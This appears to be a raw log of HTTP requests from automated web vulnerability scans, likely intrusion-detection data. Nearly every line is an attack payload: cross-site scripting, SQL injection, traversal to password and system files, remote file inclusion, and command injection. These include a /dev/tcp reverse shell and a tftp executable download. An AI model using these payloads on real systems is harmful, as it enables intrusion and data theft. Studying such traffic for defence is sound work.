\n/en-us/odzk29aa.jspa?<script>document.cookie=\"testtfvh=2141;\"</script>\n/sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>\n/examples/jsp/num/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/forum_professionnel.asp?n=c:\\boot.ini|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;c:&#039;.\n//../../../../../../../../etc/passwd\n/cgi-bin/vssetcookie.exe\n/examples/jsp/jsp2/el/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/mail.php?id='/**/union/**/select/**/1,2,1332009308,4--&blog=1\n/mv8wxfy9.cgi?<script>document.cookie=\"testrhbc=8184;\"</script>\n/oie504mr.fts?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/2aibfaczmac8?\n/roads/cgi-bin/search.pl?form=../../../../../../etc/passwd\\x00\n/scripts/1331904342-ror_session_fixation.nasl\n/scripts/tomcat_proxy_directory_traversal.nasl1331919219\n/modx/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/admcgi/scripts/fpadmcgi.exe\n/main.php?frm_daynight=q22297339&frm_passwd=&frm_referer=http%3a//192.168.28.202/main.php%3fstuff%3d1985387140&frm_user=&scr_height=&scr_width=\n/help.php?q=;uname\\x09>q17568111\\x09#\n/phpmyadmin/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/examples/jsp/jsp2/el/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/javascript/video.exe\n/main.php?stuff=\"sleep 9 #\n/cgibin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/main.php?logout=\"&ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/examples/jsp/sessions/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../vtigerservice.php\\x00\n/en-us/account/shoutbox.php?conf=../../../../../../../../etc/passwd\n/recordings/whois.cgi?action=load&whois=;id\n/cgi-bin/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/scripts/account/login.php\n/cgi-915/windmail.exe\n/driver's_education/\n/top.php?stuff=\"ping -w 8000 -n 1 1.2.3.4|rem \n/scripts/qcvjnagy16kc.php\n/vjbrrppi.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/includes/config.php?relative_script_path=http://xxxxxxx\n/examples/servlets/servletfaq.php?skin=../../admin/manager&tplpath=admin\n/weq93ppb.kspx?<script>cross_site_scripting.nasl</script>\n/cgi/.passwd\n/applescript-studio/\n/scs86g1p.mscgi?<script>document.cookie=\"testquyx=2820;\"</script>\n/main.php?logout=\"&uname >q77567986 #\n/hipkz026.mscgi?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/javascript/communicator.exe\n/examples/jsp/cal/index.cfm?fuseaction=category.display&category_id='\n/index.php?album=<script>alert(414115588139)</script>\n/examples/jsp/sessions/story.pl?next=../../../../../etc/passwd\\x00\n/scripts/fgos1sb1c1tr.pl\n/top.php?stuff=\"rm;q52915956&rem;\n/examples/jsp/error/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/y8pmygrp.pl?<script>cross_site_scripting.nasl</script>\n/script/template/index.php?main_page_directory=@rfiurl\n/manager/?user=jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--&file=index&pass=\n/cacti/index.php?show=/etc/passwd\n/script/index.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?\n/phpmyadmin/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/javascript/do.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+a+17ed+>>ctdn\n//<body><script src=http://www.example.com/test?rnd=q95193768></script>\n/examples/jsp/jsp2/el/starnet/addons/slideshow_full.php?album_name='1656410206\n/jnt3f86c.pl?<script>document.cookie=\"testcmax=9270;\"</script>\n/top.php?stuff=\"ver\\x0b>q81585151&rem\\x0b\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331909400,244455451 -- \n/examples/jsp/checkbox/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/script/index.php?path_inc=@rfiurl\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.118:8080/iroy1gvqrrqu?\n/psynch/nph-psa.exe?css=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/[nipponsei] bleach ed9 single - baby it's you [june]/\n/igtf0zon.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/a0imiuf1.jsp?<script>document.cookie=\"testxqrn=4654;\"</script>\n/h5i6crm3.php?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/zv8tv7h8.kspx?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/javascript/wysiwyg.exe\n/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=go&linecnt=500&refresh=0\n/cacti/forumdisplay.php?fid=21\"><script>x</script>\n/javascript/xsql.exe\n/en-us/account/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/javascript/08.exe\n/en-us/h5sc3gxy.aspx?<script>cross_site_scripting.nasl</script>\n/search.php?config[\"sipssys\"]=http://192.168.202.118:8080/zz5thkvtmlgl?\n/egaet53a.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/fo564rei.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/en-us/9kr0ih0v.cfc?<script>document.cookie=\"testzgnm=1183;\"</script>\n/en-us/account/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+50+6a+0c+e8+0c+00+00+00+50+8d+5d+27+53+ff+d0+91+5a+5f+eb+6b+60+89+e5+60+31++>>esbq\n/uvazfs7p.asp?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/h21y8w52.php3?<script>cross_site_scripting.nasl</script>\n/help.php?q=';rm q14794373 #\n/en-us/hipkz026.kspx?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/examples/jsp/checkbox/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/examples/jsp/num/newsdesk.cgi?t=../../../../../../etc/passwd\n/scripts/qop0sa1auif9.inc\n/openview5.exe?target=main&action=../../../../../../../../../..//windows/win.ini\n/recordings/htgrep/file=index.html&hdr=/etc/passwd\n/top.php?stuff=&ver\\x0c>q81353822&rem\\x0c\n/help.php?q=\"\\x0arm\\x09q72938489\\x09#\n/help.php?q=uname\\x09>q63592644\\x09#\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/ender's_game/\n/nyvbv05h.php?<script>document.cookie=\"testftxz=5980;\"</script>\n/phpmyadmin/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/help.php?q=\"ping -w 10000 -n 1 4.3.2.1&rem \n/javascript/packed.exe\n/t7tm4m0b.pl?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\";uname\\x09>q18442351\\x09#\n/7u1pb2xi.kspx?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/dslpwt15.pl?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/scripts/webplus?script=/../../../../etc/passwd\n/3rdparty/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../\n/examples/jsp/checkbox/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/javascript/live.exe\n<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/x7pclv4s.htm?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/examples/servlets/servlet/way-board/way-board.cgi?db=/etc/passwd\\x00\n/examples/jsp/jsp2/jspx/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/help.php?q=\";rm q49727674 #\n/n1afe1y6.dll?<script>cross_site_scripting.nasl</script>\n/en-us/account/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/en-us/ddoworrl.pl?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/examples/jsp/num/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/javascript/win.exe\n/oie504mr.do?<script>document.cookie=\"testtpby=7052;\"</script>\n/en-us/9kr0ih0v.nsf?<script>document.cookie=\"testzgnm=1183;\"</script>\n/yver8r9o.x?<script>cross_site_scripting.nasl</script>\n/d44uk9h2.do?<script>document.cookie=\"testmybc=2088;\"</script>\n/javascript/diff.exe\n/examples/jsp/jsp2/jspx/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/top.php?stuff=&uname >q64726771 #\n/main.php?stuff=\"\\x0duname\\x09>q16681283\\x09#\n/ra_bust'em/\n/vmi8bb12.php3?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/examples/jsp/error/shopper.cgi?newpage=../../../../../../etc/passwd\n/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/ldlchhikup0;echo|awstats177192.txt\n/top.php?stuff=\"\\x0duname\\x09>q29444369\\x09#\n/qczkquis.fts?<script>document.cookie=\"testkwlg=5591;\"</script>\n/examples/jsp/cal/texis.exe/?-dump\n/twistednamesinitscript/\n/8x6w469u.kspx?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/examples/jsp/error/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/cgi-bin/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/subscription_only/\n/help.php?q=\"&ping;-w;7000;-n;1;4.3.2.1&rem;\n/nyjgaorz.exe?<script>cross_site_scripting.nasl</script>\n/igtf0zon.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/scripts/index.php?show=http://xxx./nessus\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/main.php%3fstuff%3d1985387140&frm_user=&scr_height=&scr_width=q54512396\n/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/phpwcms_template/inc_script/frontend_render/navigation/config_phplm.php?html_menu_dirpath=http://192.168.202.118:8080/zz5thkvtmlgl?\n/top.php?stuff=\"uname\\x09>q73669717\\x09#\n/cgi-sys/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/schlumberger_descriptor/\n/i7prbs22.jspa?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/\"video games\"/\n/cgi-bin/search.jsp?q=%\"<script>alert(1331908697)</script>\n/top.php?stuff='uname >q33698181 #\n/9kr0ih0v.dll?<script>document.cookie=\"testzgnm=1183;\"</script>\n/examples/jsp/sessions/phpnews/sendtofriend.php?mid='1'\n/help.php?q='|sleep\\x0911\\x09#\n/top.php?stuff=ver,>q52626316&rem,\n/examples/jsp/checkbox/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/r3le3om5.jsp?<script>cross_site_scripting.nasl</script>\n/index.php?in=song&term=lambada&action=search&start='error_test\n/fo564rei.aspx?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=ping;-w;7000;-n;1;1.2.3.4&rem;\n/vhzmaia2.idc?<script>document.cookie=\"testkogj=3979;\"</script>\n/33y9gcqq.exe?<script>document.cookie=\"testnvxc=4301;\"</script>\n/phpmyadmin/cvslog.cgi?file=<script>window.alert</script>\n////../../data/config/microsrv.cfg\n/test.php?evalme=eval($_server[http_x_izzjikbmcovh]);\n/r3le3om5.x?<script>cross_site_scripting.nasl</script>\n/m4kkjf8l.fts?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/search.asp?searchtxt=\"><script>alert(414585596939)</script><\"&catid=&search=search&searchtype=0\n/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/index_scripting/\n/examples/jsp/num/shoutbox.php?conf=../../../../../../../../etc/passwd\n/phpmyadmin//........................................................................../../../../../../../../etc/passwd\n/javascript/docebo.exe\n/scripts/index.php?op=default&date=200607' union select 1,1735345304,1,1,1,1,1,1,1,1--&blogid=1\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1332010398\n/javascript/recycled.exe\n/index.php?id='union/**/select/**/0,0,531946285,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/ywaxntrx.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/(cooking) men's health recipes/\n/6n7aacgg.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<20050914235232/\n/l752x1ry.cgi?<script>cross_site_scripting.nasl</script>\n/<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.96:8080/whmch8ftkt7kv?\n/i686v90l.fts?<script>document.cookie=\"testfutf=1550;\"</script>\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../vtigerservice.php\\x00\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,939754819,0,0,0,0,0--\n/if69ddo1.x?<script>document.cookie=\"testiabz=5220;\"</script>\n/examples/jsp/sessions/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/vwmg565s.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/getjobid.exe\n/javascript/.passwd.rb\n/scripts/callboth.php?seq=654321&out=123456&in=1331919003@nessus\\x0d\\x0aasteridex_in_code_injection.nasl\n/scripts_photositeprinting/\n/javascript/.htaccess/sfish>'>\"></sfish><sfish>\n/scripts/dataservice.asmx/authuser?username='nessus1331908868&password=nasl&needcompress=0\n/playerscript/\n/0z575z74.jsp?<script>document.cookie=\"testuhsv=9753;\"</script>\n/cacti/athenareg.php?pass= ;id\n/manager/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/scripts/perl.exe?-v\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/ipb5ri?\\x00\n/script/common.inc.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/igtf0zon.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"|ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/s7qus4g3.html?<script>cross_site_scripting.nasl</script>\n/starnet/addons/slideshow_full.php?album_name='1472076059\n/jujgxwav.jspa?<script>document.cookie=\"testknim=9383;\"</script>\n/5qnlm5z2.asp?<script>document.cookie=\"testsixi=8451;\"</script>\n/examples/jsp/cal/javascript.php?abs_path=/etc/passwd\\x00\n/phpmyadmin/index.php.exe\n/javascript/v.exe\n/top.php?stuff='\\x0auname\\x09>q26413975\\x09#\n/main.php?stuff=\"\\x0drm\\x09q53275598\\x09#\n/javascript/right.exe\n/t3af3tdz.htm?<script>cross_site_scripting.nasl</script>\n/scripts/shop.plx/page=nessus618432308\n/fa8p8lr8.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nmw0do67.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+2e+74+65+78+74+00+00+00+00+10+00+00+00+10+00+00+00+10+00+00+00++>>esbq\n/examples/jsp/cal/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/ht8pn8uq.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/search.php?searchstring=<script>foo</script>\n/exchange/..\\xc0/..\\xc0/..\\xc0/..\\xc0/..\\xc0/../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/javascript/faq.exe\n/help.php?q=\"\\x0auname >q55525686 #\n/help.php?q=ver >q34656493&rem \n/top.php?stuff=&ping;-w;9000;-n;1;1.2.3.4&rem;\n/058securityd'ohlts/\n/82q7ywa8.fts?<script>document.cookie=\"testpwew=1315;\"</script>\n/scripts/typo3/index.php\n/jnt3f86c.jsp?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/90;18845259/\n/scripts/g2data/install.log\n/en-us/fo564rei.dll?<script>cross_site_scripting.nasl</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;/tmp/lknajdyaas;\"\n/examples/servlets/servlet/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n/top.php?stuff=\"&uname >q95298396 #\n/606wkcop.nsf?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=&ver\\x09>q31187455&rem\\x09\n/top.php?stuff=\"ver\\x09>q66382972&rem\\x09\n/_vti_bin/fpcount.exe?page=default.asp|image=3\n/recordings/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/manager/shoutbox.php?conf=../\n/0u75ldxq.pl?<script>cross_site_scripting.nasl</script>\n/x7pclv4s.pl?<script>document.cookie=\"testiulz=3709;\"</script>\n/javascript/htpasswd.ini\n/ydexw8by.kspx?<script>document.cookie=\"testulex=4996;\"</script>\n/en-us/account/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n//q47417758&#38;q6971&#34;q6971&#60;q6971&#62;q47417758\n/buddha's birthday/\n/0qhcnefz.dll?<script>cross_site_scripting.nasl</script>\n/cgi/r.cgi?file=../../../../../../../../../../etc/passwd\n/mary shelley's frankenstein (full)/\n/javascript/dtd.exe\n/gy23xnjq.mscgi?<script>cross_site_scripting.nasl</script>\n/weq93ppb.fts?<script>cross_site_scripting.nasl</script>\n/cgi-bin/webadmin.php?show=/etc/passwd\n/examples/jsp/num/index.php?cat_select=<script>foo</script>\n/examples/jsp/num/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/scripts/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/phpmyadmin/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/help.php?q=\"ping;-w;8000;-n;1;4.3.2.1&rem;\n/recordings/more.php?id=1'\n/hjdzm96v.mscgi?<script>document.cookie=\"testbyqe=7474;\"</script>\n/scripts/htmlscript?../../../../../../../../../etc/passwd\n/main.php?logout=\"&ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/index.php?src=1&_common=1&time=1331904460&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/error/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n/main.php?stuff='uname >q29765145 #\n/examples/jsp/sessions/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/en-us/fo564rei.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/?<script>document.cookie=\"testotoy=6142;\"</script>\n/edzaia0i.pl?<script>cross_site_scripting.nasl</script>\n/order/login.php?svr_rootscript=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/src/scripture.php?pageheaderfile=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/7o5qp766.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/ddoworrl.exe?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/x7pclv4s.htm?<script>document.cookie=\"testiulz=3709;\"</script>\n/j2kdmfw4.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"ping,-w,9000,-n,1,4.3.2.1&rem,\n/examples/jsp/jsp2/el/webdist.cgi?distloc=;id\n/javascript/.bashrc.exe\n/scripts/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/en-us/9kr0ih0v.pl?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/examples/jsp/jsp2/el/cvslog.cgi?file=<script>window.alert</script>\n/vjbrrppi.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1435895751--\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/help.php?q=\"ping;-w;7000;-n;1;4.3.2.1|rem;\n/styles.php?toroot=/etc/passwd\\x00\n/r3le3om5.php?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/bmeun223.cfm?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/zuihld5m.html?<script>cross_site_scripting.nasl</script>\n/manager/check_user_id.php?user_id=<script>foo</script>\n/include/default_header.php?script_path=http://192.168.202.118:8080/ghl9il?\n/projects/1/repository/annotate?rev=`0<&68-;exec 68<>/dev/tcp/192.168.202.118/5095;sh <&68 >&68 2>&68`\n/scripts/services/help/?module=horde&show=menu\n/javascript/samba.exe\n/phpmyadmin/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/htbin/gw5/gwweb.exe?help=bad-request\n/help.php?q=\"ver&rem;\n/e9rx3ya4.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/.htaccess\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1332008331\n/cacti/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/searchresults.asp?searchword='test1234&wordsearchcrit=yes&image.x=0&image.y=0\n/main.php?stuff=\"&ping,-w,9000,-n,1,1.2.3.4&rem,\n/u8yiqilu.x?<script>document.cookie=\"testswjp=6010;\"</script>\n/o6ebbirj.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script/ident/loginmodif.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?\n/phpwcms_template/inc_script/frontend_render/navigation/config_html_menu.php?html_menu_dirpath=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/ows-bin/oaskill.exe?abcde.exe\n/examples/jsp/colors/js/scripts.php?load=/etc/passwd\\x00\n/cgi-bin/index.php?id='union/**/select/**/0,0,1849623348,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/cgibin/sawmill?rfcf+\"sawmillinfo/sawmillpassword\"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3\n/forum.asp?n=/....../boot.ini|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/examples/jsp/cal/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/examples/jsp/jsp2/el/shopper.cgi?newpage=../../../../../../etc/passwd\n/w4996nr0.jspa?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/7u1pb2xi.jspa?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/main.php?logout='sleep 7 #\n/scripts/index.cfm?catid=1 sql\n/examples/jsp/num/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/top.php?stuff=;del\\x09q22474851\\x09#\n/top.php?stuff=\"ping\\x09-w\\x0910000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/primalscript4professional/\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+6c+41+68+56+69+72+74+54+56+ff+d7+83+c4+10+5a+52+6a+40+68+00+10+00+00+52+6a++>>esbq\n/examples/servlets/servlet/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/top.php?stuff=\"ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/examples/jsp/error/index.php?configfile=../../../../../../../../../etc/passwd\n/scripts/1ecj.exe?/x+/c+tftp -i 192.168.202.96 get juvqbtez sssdpups.exe\n/newsarchive.php?path_to_script=http://192.168.202.118:8080/2aibfaczmac8??&cmd=ls\n/phpmyadmin/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/portfolio.php?cat_id=\"force_sql_error\n/show_archives.php?template=../inc/ipban.mdu\\x00&member_db[1]=1&action=add&add_ip=\"<?php echo md5(\"test\"); die;?>.\" \n/main.php?stuff=\"rm\\xa0q89318346&rem\\xa0\n/ybz5rz7a.aspx?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/perl-status/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/joomla12/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=\n/i686v90l.mscgi?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/examples/jsp/sessions/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/examples/jsp/num/language.php?data_dir=/etc/passwd\\x00\n/help.php?q=\"&sleep\\x0911\\x09#\n/examples/jsp/colors/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/hipkz026.idc?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/scripts/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/rbec2ohx.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/crash.exe\n/examples/servlets/servlet/index.php?cat_select=<script>foo</script>\n/top.php?stuff=|ping;-w;7000;-n;1;4.3.2.1|rem;\n/p043snfr.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/www/delivery/ac.php?bannerid=-1331919146+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ag5vvnfs]));die;/*\n/javascript/request.exe\n/fc9t54l7.kspx?<script>document.cookie=\"testggad=2000;\"</script>\n/eei78ore.htm?<script>cross_site_scripting.nasl</script>\n/magnificent_subscription/\n/examples/servlets/servlet/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/main.php?stuff=\"del\\x0cq43448647&rem\\x0c\n/scripts/photo/manage.cgi\n..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini\n/bzuf9ozq.x?<script>cross_site_scripting.nasl</script>\n/javascript/swf.exe\n/scripts/c99shell.php\n/ywaxntrx.jsp?<script>cross_site_scripting.nasl</script>\n/javascript/auto.exe\n/examples/jsp/colors/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/cgi-bin/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/static//................etc/passwd\n/nmw0do67.asp?<script>cross_site_scripting.nasl</script>\n/recordings/docs.php?doc=../jpgraph-1.12.1/docs/index\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908785&lang_crm=../../vtigerservice.php\\x00\n/r3le3om5.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/i2n4v4rl.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/scripts/u7m5ok8eqpfy.pl\n/manager/save.php?file_save=/etc/passwd\n/ewc3rz1l.php3?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/examples/jsp/cal/index.php?site=../../../../../../../../etc/passwd\\x00\n/t7tm4m0b.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/j4oqyvga.cfm?<script>cross_site_scripting.nasl</script>\n/cgis/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/cgi-bin/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/cgi-bin/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/cacti/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/scripts/irbf6nj7oyfh.asp\n/help.php?q=ping;-w;11000;-n;1;4.3.2.1&rem;\n/ju0u7kfo.exe?<script>cross_site_scripting.nasl</script>\n/xss-faq/\n/icons/script.png\n/javascript/htpasswd.ep\n/cgis/.passwd\n/javascript/rdf.exe\n/examples/jsp/cal/index.php?p='nessus\n/examples/jsp/num/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/report.php?scriptpath=http://cirt.net/rfiinc.txt??\n/javascript/fuck.exe\n/top.php?stuff=\"rm\\x09q89765477\\x09#\n/scripts/index.php?op=default&date=200607' union select 1,1249459115,1,1,1,1,1,1,1,1--&blogid=1\n/vwmg565s.do?<script>cross_site_scripting.nasl</script>\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.cfc\n/scripts/samples/search/webhits.exe\n//../../../../../../../../../../../../etc/passwd\n/phpmyadmin/../phpmyadmin.tar.bz2\n/examples/jsp/cal/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/scripts/emumail.fcgi\n/main.php?logout=\"&del;q21715323&rem;\n/examples/jsp/jsp2/jspx/styles.php?toroot=/etc/passwd\\x00\n/emailsubscription/\n/index.php?config[\"sipssys\"]=http://192.168.202.96:8080/txenjrxf3?\n/examples/jsp/num/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/x7pclv4s.jsp?<script>document.cookie=\"testiulz=3709;\"</script>\n/help.php?q=\"\\x0asleep 8 